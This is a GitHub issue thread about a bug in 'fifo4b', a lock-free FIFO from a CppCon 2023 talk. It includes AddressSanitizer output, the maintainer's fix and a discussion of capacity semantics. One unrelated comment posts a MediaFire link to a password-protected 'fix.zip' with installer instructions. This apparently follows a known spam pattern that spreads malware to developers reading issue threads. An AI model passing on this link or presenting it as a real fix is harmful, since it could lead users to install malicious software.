### ISSUE TITLE
Could you please explain more details of fifo4b?

### ISSUE THREAD

**Issue by pffang** [CharlesFrasch/cppcon2023#1]
I didn't see the explanation of fifo4b in your video of CppCon 2023.
This one looks not a correct implementation.
Could you please add more details?

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CharlesFrasch** [comment]
Would you please describe what about the implementation you feel is not correct.
R/cff

**Comment by pffang** [comment]
If you add fifo4 into unit tests, you will see push() trigger heap-buffer-overflow.
Because pushCursor tries to access the index out of capacity.
```
[ RUN      ] FifoTest/0.popFullFifo
capacity: 4
pushCursor: 0
nextPushCursor: 1
pushCursor: 1
nextPushCursor: 2
pushCursor: 2
nextPushCursor: 3
pushCursor: 3
nextPushCursor: 4
popCursor: 0
nextPopCursor: 1
pushCursor: **4**
=================================================================
unitTests.cpp:22: Failure
Failed
Encountered an address sanitizer error
```

**Comment by CharlesFrasch** [comment]
That's a pretty good reason to think the implementation is not correct.
I'll get back to you soon.
R/cff

**Comment by CharlesFrasch** [comment]
See if my latest changes work for you.
R/cff

**Comment by pffang** [comment]
Hi @CharlesFrasch,

Sorry to trouble you again. 
There's no address sanitizer error now, but I still have a doubt on fifo4b.

In unit tests, we initialize the fifo4b with capacity = 4, and fifo4b::capacity() also returns 4.
So the index of the cursor should be [0-3], but in fact, we can see both pushCursor and popCursor access index 4. We can save 5 elements in the fifo4b.

Why design like this?

**Comment by CharlesFrasch** [comment]
See discussion for Fifo3A and new discussion for Fifo4b. They are the same.
R/cff

**Comment by pffang** [comment]
Understand, thanks
